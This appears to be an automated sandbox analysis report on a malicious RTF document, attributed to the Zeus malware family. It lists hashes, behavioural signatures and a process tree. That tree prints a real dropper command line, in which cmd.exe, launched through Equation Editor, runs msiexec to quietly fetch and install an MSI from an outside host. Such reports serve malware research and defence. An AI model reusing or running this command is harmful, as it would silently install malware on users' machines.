Analysis
max time kernel: 120s
max time network: 121s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 12-12-2024 06:03
Static task: static1
Behavioral task: behavioral1
  Sample: e507b370764f67144cc781a69981e965_JaffaCakes118.rtf
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: e507b370764f67144cc781a69981e965_JaffaCakes118.rtf
  Resource: win10v2004-20241007-en
General
Target: e507b370764f67144cc781a69981e965_JaffaCakes118.rtf
Size: 261KB
MD5: e507b370764f67144cc781a69981e965
SHA1: b547b4f7c269a8f7d6b8df59b7eb035faaf68236
SHA256: 33456b620018dd5f68a6a536804f3da03e87eaf66c356f2b4f8d4d82ddc8866a
SHA512: a15f0b024a8abd5c140d22c711befe5fd3f8f6b92bbcf1ee56c970c4bf004289336b5865fc59a38c6fe0d92d4c08fb0a9205608905dc4fc1e8dbe8f4b2f17f2a
SSDEEP: 768:s7Kf2sdrM3xaSybdRZXZWkWZNLeSGfmg3151tVzFkkQAyijfjBw7BVMiy2sFBYSq:sxxQW3yF3Fjy0+VMPate/ePB
Malware Config
Signatures
- Zeus
- Zeus family
- Use of msiexec (install) with remote resource (1 IoC)
  PID   Process
  1708  msiexec.exe
- Blocklisted process makes network request (2 IoCs)
  Flow  PID   Process
  5     2240  msiexec.exe
  6     2240  msiexec.exe
- Drops file in Windows directory (1 IoC)
  Description                   IoC                               Process
  File opened for modification  C:\Windows\Debug\WIA\wiatrace.log  WINWORD.EXE
- System Location Discovery: System Language Discovery (1 TTP, 4 IoCs)
  Attempts to gather information about the system language of a victim host in order to infer its geographical location.
  Description  IoC                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WINWORD.EXE
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  EQNEDT32.EXE
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe
- Office loads VBA resources, possible macro or embedded object present
- Launches Equation Editor (1 TTP, 1 IoC)
  Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
  PID   Process
  2008  EQNEDT32.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  PID   Process
  2348  WINWORD.EXE
- Suspicious use of AdjustPrivilegeToken (34 IoCs)
  Token                           PID   Process
  SeShutdownPrivilege             1708  msiexec.exe
  SeIncreaseQuotaPrivilege        1708  msiexec.exe
  SeRestorePrivilege              2240  msiexec.exe
  SeTakeOwnershipPrivilege        2240  msiexec.exe
  SeSecurityPrivilege             2240  msiexec.exe
  SeCreateTokenPrivilege          1708  msiexec.exe
  SeAssignPrimaryTokenPrivilege   1708  msiexec.exe
  SeLockMemoryPrivilege           1708  msiexec.exe
  SeIncreaseQuotaPrivilege        1708  msiexec.exe
  SeMachineAccountPrivilege       1708  msiexec.exe
  SeTcbPrivilege                  1708  msiexec.exe
  SeSecurityPrivilege             1708  msiexec.exe
  SeTakeOwnershipPrivilege        1708  msiexec.exe
  SeLoadDriverPrivilege           1708  msiexec.exe
  SeSystemProfilePrivilege        1708  msiexec.exe
  SeSystemtimePrivilege           1708  msiexec.exe
  SeProfSingleProcessPrivilege    1708  msiexec.exe
  SeIncBasePriorityPrivilege      1708  msiexec.exe
  SeCreatePagefilePrivilege       1708  msiexec.exe
  SeCreatePermanentPrivilege      1708  msiexec.exe
  SeBackupPrivilege               1708  msiexec.exe
  SeRestorePrivilege              1708  msiexec.exe
  SeShutdownPrivilege             1708  msiexec.exe
  SeDebugPrivilege                1708  msiexec.exe
  SeAuditPrivilege                1708  msiexec.exe
  SeSystemEnvironmentPrivilege    1708  msiexec.exe
  SeChangeNotifyPrivilege         1708  msiexec.exe
  SeRemoteShutdownPrivilege       1708  msiexec.exe
  SeUndockPrivilege               1708  msiexec.exe
  SeSyncAgentPrivilege            1708  msiexec.exe
  SeEnableDelegationPrivilege     1708  msiexec.exe
  SeManageVolumePrivilege         1708  msiexec.exe
  SeImpersonatePrivilege          1708  msiexec.exe
  SeCreateGlobalPrivilege         1708  msiexec.exe
- Suspicious use of SetWindowsHookEx (2 IoCs)
  PID   Process
  2348  WINWORD.EXE
  2348  WINWORD.EXE
- Suspicious use of WriteProcessMemory (15 IoCs)
  Description                     PID   Process       Target PID
  PID 2008 wrote to memory of 2500  2008  EQNEDT32.EXE  31
  PID 2008 wrote to memory of 2500  2008  EQNEDT32.EXE  31
  PID 2008 wrote to memory of 2500  2008  EQNEDT32.EXE  31
  PID 2008 wrote to memory of 2500  2008  EQNEDT32.EXE  31
  PID 2500 wrote to memory of 1708  2500  cmd.exe       33
  PID 2500 wrote to memory of 1708  2500  cmd.exe       33
  PID 2500 wrote to memory of 1708  2500  cmd.exe       33
  PID 2500 wrote to memory of 1708  2500  cmd.exe       33
  PID 2500 wrote to memory of 1708  2500  cmd.exe       33
  PID 2500 wrote to memory of 1708  2500  cmd.exe       33
  PID 2500 wrote to memory of 1708  2500  cmd.exe       33
  PID 2348 wrote to memory of 1904  2348  WINWORD.EXE   36
  PID 2348 wrote to memory of 1904  2348  WINWORD.EXE   36
  PID 2348 wrote to memory of 1904  2348  WINWORD.EXE   36
  PID 2348 wrote to memory of 1904  2348  WINWORD.EXE   36
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e507b370764f67144cc781a69981e965_JaffaCakes118.rtf"
  PID: 2348
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  C:\Windows\splwow64.exe
    Command line: C:\Windows\splwow64.exe 12288
    PID: 1904

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
  Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  PID: 2008
  - System Location Discovery: System Language Discovery
  - Launches Equation Editor
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd.exe & /C CD C: & msiexec.exe /i https://a.doko.moe/ldbbxq.msi /quiet
    PID: 2500
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\msiexec.exe
      Command line: msiexec.exe /i https://a.doko.moe/ldbbxq.msi /quiet
      PID: 1708
      - Use of msiexec (install) with remote resource
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  PID: 2240
  - Blocklisted process makes network request
  - Suspicious use of AdjustPrivilegeToken